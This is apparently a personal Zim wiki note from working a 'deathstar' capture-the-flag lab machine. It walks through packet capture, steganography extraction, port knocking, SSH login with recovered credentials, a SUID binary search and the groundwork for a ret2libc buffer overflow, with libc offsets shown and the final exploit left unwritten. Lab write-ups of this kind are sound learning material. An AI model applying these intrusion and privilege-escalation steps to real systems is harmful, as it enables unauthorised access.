Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-07T04:35:32-04:00

====== deathstar ======
Created Sunday 07 June 2020

172.16.250.130


no nmap scan ..
lets try alternative



analyze

sudo tcpdump -i vmnet8 host $IP

got some unkonw udp 

lets futher analyze
sudo tcpdump -i vmnet8 host $IP and not arp -w dwathstar.pcap

got something with pcap files

sudo tcpick -C -yP -r dwathstar.pcap

lets write a python code

and 
sudo tcpdump -i vmnet8 udp and host $IP and not icmp and not arp -w networking.pcap
 run python code

 got base64 txt convert to jpg 

got blueprint from jpg

steghide extract -sf blueprint.jpg -p DS-1@OBS

port 10110

knock in sequence to unlock port 10110
sequence of 3 port (i dint understand this why)
sudo knock $IP 197 719 801 983

nmap -A -p10110 $IP -Pn


 ssh -p 10110 $IP
user pass (do some oshint)
erso
lyra13
 ssh -p 10110 -q erso@$IP

 


 find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

 ls -lah /bin/dartVader


 copy to our machine

scp -P 10110 eros@$IP:/bin/dartvader ./


reverse engineering
gdb ./dartVader 
----disassemble main


cat /proc/sys/kernel/randomize_va_space 


lets do some buffe overflow

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100

./dartVader Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A


sudo dmesg | tail
[ 4972.641955] usb 1-2: Device not responding to setup address.
[ 4972.849907] usb 1-2: device not accepting address 17, error -71
[ 4973.809964] usb 1-2: new high-speed USB device number 18 using xhci_hcd
[ 4973.831333] usb 1-2: New USB device found, idVendor=0e8d, idProduct=2008, bcdDevice= 2.23
[ 4973.831338] usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 4973.831341] usb 1-2: Product: iris88
[ 4973.831343] usb 1-2: Manufacturer: LAVA
[ 4973.831345] usb 1-2: SerialNumber: LICC60G26C808C6A
[ 5333.936093] dartVader[5321]: segfault at 63413563 ip 0000000063413563 sp 00000000ffb06e80 error 14 in libc-2.30.so[f7cff000+1d000]
[ 5333.936106] Code: Bad RIP value.


/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x0000000063413563 -l 100

onvictim

we need to know the memory address of libc librar

while true; do ldd /bin/dartVader; done | grep libc

'''erso@deathStar1:~$ while true; do ldd /bin/dartVader; done | grep libc
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7619000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75d2000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75fd000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb760c000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f6000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75b9000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb752c000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75e0000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7561000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7590000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c2000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb752c000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f7000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759c000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75d0000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb761d000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb754d000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f4000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757b000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755e000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755e000)'''

we need the location of exit, system and the /bin/sh

--readelf -a /lib/i386-linux-gnu/libc.so.6 | grep system
-- strings -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
--readelf -a /lib/i386-linux-gnu/libc.so.6 | grep exit


'''erso@deathStar1:~$ readelf -a /lib/i386-linux-gnu/libc.so.6 | grep system
   243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
erso@deathStar1:~$ strings -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
 162d4c /bin/sh
erso@deathStar1:~$ readelf -a /lib/i386-linux-gnu/libc.so.6 | grep exit
  [25] __libc_atexit     PROGBITS        001ab254 1aa254 000004 00  WA  0   0  4
   03     .tdata .init_array __libc_subfreeres __libc_atexit __libc_thread_subfreeres .data.rel.ro .dynamic .got .got.plt .data .bss 
   09     .tdata .init_array __libc_subfreeres __libc_atexit __libc_thread_subfreeres .data.rel.ro .dynamic .got 
001aceec  00056406 R_386_GLOB_DAT    001ad204   argp_err_exit_status
001acfa4  00082a06 R_386_GLOB_DAT    001ad154   obstack_exit_failure
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 __cxa_at_quick_exit@@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
   446: 000336d0   268 FUNC    GLOBAL DEFAULT   12 __cxa_thread_atexit_impl@@GLIBC_2.18
   554: 000b8634    24 FUNC    GLOBAL DEFAULT   12 _exit@@GLIBC_2.0
   609: 0011e780    56 FUNC    GLOBAL DEFAULT   12 svc_exit@@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 quick_exit@@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 __cxa_atexit@@GLIBC_2.1.3
  1037: 00128ce0    60 FUNC    GLOBAL DEFAULT   12 atexit@GLIBC_2.0
  1380: 001ad204     4 OBJECT  GLOBAL DEFAULT   31 argp_err_exit_status@@GLIBC_2.1
  1492: 000fb610    62 FUNC    GLOBAL DEFAULT   12 pthread_exit@@GLIBC_2.0
  2090: 001ad154     4 OBJECT  GLOBAL DEFAULT   31 obstack_exit_failure@@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 on_exit@@GLIBC_2.0
  2386: 000fc180     2 FUNC    GLOBAL DEFAULT   12 __cyg_profile_func_exit@@GLIBC_2.2'''

  now write exploit

  
